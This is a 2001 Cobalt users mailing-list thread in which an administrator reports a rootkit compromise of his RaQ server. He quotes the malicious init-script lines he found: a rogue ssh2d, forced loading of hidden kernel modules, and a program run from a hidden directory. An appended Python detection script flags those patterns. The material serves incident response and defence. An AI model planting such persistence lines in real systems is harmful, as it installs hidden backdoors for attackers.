RE: [cobalt-users] Recent Hacks (resolution in sight)
- Subject: RE: [cobalt-users] Recent Hacks (resolution in sight)
- From: "Chris Mason" <chris@xxxxxx>
- Date: Fri Feb 9 04:56:17 2001
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>
You think you have problems! I got so paranoid with all this talk of cracked
machines that I rushed this morning to install ipchains, pmfirewall,
portsentry, and logcheck. I only use SSH, I've disabled telnet.
Unfortunately I was a little careless in my installation and I have now
totally locked myself out of the machine. I can't ssh, there's no telnet,
the gui is not available as I installed a certificate, I don't know what
next to do. Even tech support at the hosting location may not be able to get
in!
Any ideas?
Chris Mason
Box 340, The Valley, Anguilla, British West Indies
Tel: 264 497 5670 Fax: 264 497 8463
USA Fax (561) 382-7771
Take a virtual tour of the island
http://net.ai/ The Anguilla Guide
Find out more about NetConcepts
www.netconcepts.ai
Talk to me in real time with Instant Messenger: masonc92@xxxxxxxxxxx
-----Original Message-----
From: cobalt-users-admin@xxxxxxxxxxxxxxx
[mailto:cobalt-users-admin@xxxxxxxxxxxxxxx]On Behalf Of inc
Sent: Friday, February 09, 2001 8:35 AM
To: cobalt-users@xxxxxxxxxxxxxxx
Subject: [cobalt-users] Recent Hacks (resolution in sight)
thanks to those who maintained email with me today; it's been a great help.
here's my report:
i've successfully (touch wood) used the unhack.pl script recommended by
Steve Bassi via Mike Fritsch.
after running unhack.pl, there's one file that unhack said was neither
hacked (according to its internal MD5 checksums) nor "original" cobalt.
this file, /etc/rc.d/init.d/network contains the following which i would say
is part of the hack.
/usr/bin/ssh2d -q
if test -f "/dev/kmod"; then
/sbin/insmod -f /usr/lib/crth.o
/sbin/insmod -f /usr/lib/crtz.o
fi
if test -f /lib/security/.config/sn ; then
cd /lib/security/.config;./lpsched
fi
touch /var/lock/subsys/network
if test -f "/dev/dos"; then
/usr/lib/lpq
fi
;;
i've not installed ssh2d, and crth.o and crtz.o look damned nasty to me.
note that unhack.pl DOESN'T clear up crtz.o. can anyone shed some light on
the remaining commands there? i've disabled all these lines until i know
what they are. my "network" script was considerably more complicated than
the "network" script included with unhack.tar.gz
i also spent the whole day studying up on cracking and studying the scripts
and binaries that were placed on my raq.
the only weird thing i could find in my logs was an ftp login from korea. i
have not published any ftp site urls anywhere, and this is the only ftp
login i've ever seen in the logs apart from my own, and the 127.0.0.1
entries used by the admin. this ftp login occurred 4 hours before the
rootkit was activated.
so i would think that proftpd was exploited to gain root access.
all log entries bar the ftp one above were cleaned up, but there were
footsteps left behind in /.bash_history which reflected an rcp download from
a us .edu site.
at this point ps, su, all manner of executables are replaced to hide any
unusual activity. flash22 suggested i try "top" -- which lo and behold
turned up all my logins running as "/bin/xlogin" -- which appeared to be a
copy of the original cobalt "/bin/login" .. a file /etc/ld.so.hash seems to
have a crypted password in it. the replaced "/bin/login" was a very small
file next to the original cobalt "/bin/login".
i'm happy to answer any questions on this.
thanks again to those who helped me climb out of the black hole!
--
chris paul
fastmedia.net
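As an added illustration (not code from the post, from unhack.pl or from Cobalt), the script below applies the same idea chris paul describes, comparing an init script against a known-good copy, to the exact fragment he quoted. The clean baseline is a constructed stand-in for the real Cobalt "network" script, and the three heuristics (module loaded from outside /lib/modules, path under a dot-directory, trigger keyed on a marker file under /dev) are my own assumptions about what is worth flagging.

```python
"""Triage an init script: report lines absent from a known-good baseline."""
import re

# Constructed stand-in for the clean Cobalt 'network' script (assumption).
BASELINE_NETWORK = """\
#!/bin/sh
. /etc/sysconfig/network
touch /var/lock/subsys/network
;;
"""

# Fragment of the compromised /etc/rc.d/init.d/network quoted in the post.
HACKED_FRAGMENT = """\
/usr/bin/ssh2d -q
if test -f "/dev/kmod"; then
/sbin/insmod -f /usr/lib/crth.o
/sbin/insmod -f /usr/lib/crtz.o
fi
if test -f /lib/security/.config/sn ; then
cd /lib/security/.config;./lpsched
fi
touch /var/lock/subsys/network
if test -f "/dev/dos"; then
/usr/lib/lpq
fi
;;
"""

# Shell keywords that carry no meaning on their own; skipped as noise.
NOISE = {"if", "then", "else", "fi", "esac", "done", ";;"}
INSMOD_RE = re.compile(r"\b(?:insmod|modprobe)\b.*?(\S+\.o)\b")
HIDDEN_DIR_RE = re.compile(r"/\.[^/\s;]+")
DEV_MARKER_RE = re.compile(r"\btest -f\s+\"?/dev/\w+\"?")

def classify(line):
    """Heuristic reason a line looks like rootkit persistence, or None."""
    m = INSMOD_RE.search(line)
    if m and not m.group(1).startswith("/lib/modules/"):
        return "kernel module loaded from outside /lib/modules"
    if HIDDEN_DIR_RE.search(line):
        return "path under a hidden (dot) directory"
    if DEV_MARKER_RE.search(line):
        return "trigger keyed on a marker file under /dev"
    return None

def triage(script_text, baseline_text):
    """Return (line, reason) for every non-noise line missing from the baseline."""
    baseline = {l.strip() for l in baseline_text.splitlines() if l.strip()}
    findings = []
    for raw in script_text.splitlines():
        line = raw.strip()
        if not line or line in NOISE or line in baseline:
            continue
        findings.append((line, classify(line) or "not in baseline"))
    return findings
```

Lines such as `/usr/bin/ssh2d -q` are reported only as "not in baseline"; the verdict still needs the on-box comparison with a trusted copy of the binary, as unhack.pl does with its MD5 list.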
_______________________________________________
cobalt-users mailing list
cobalt-users@xxxxxxxxxxxxxxx
To Subscribe or Unsubscribe, please go to:
http://list.cobalt.com/mailman/listinfo/cobalt-users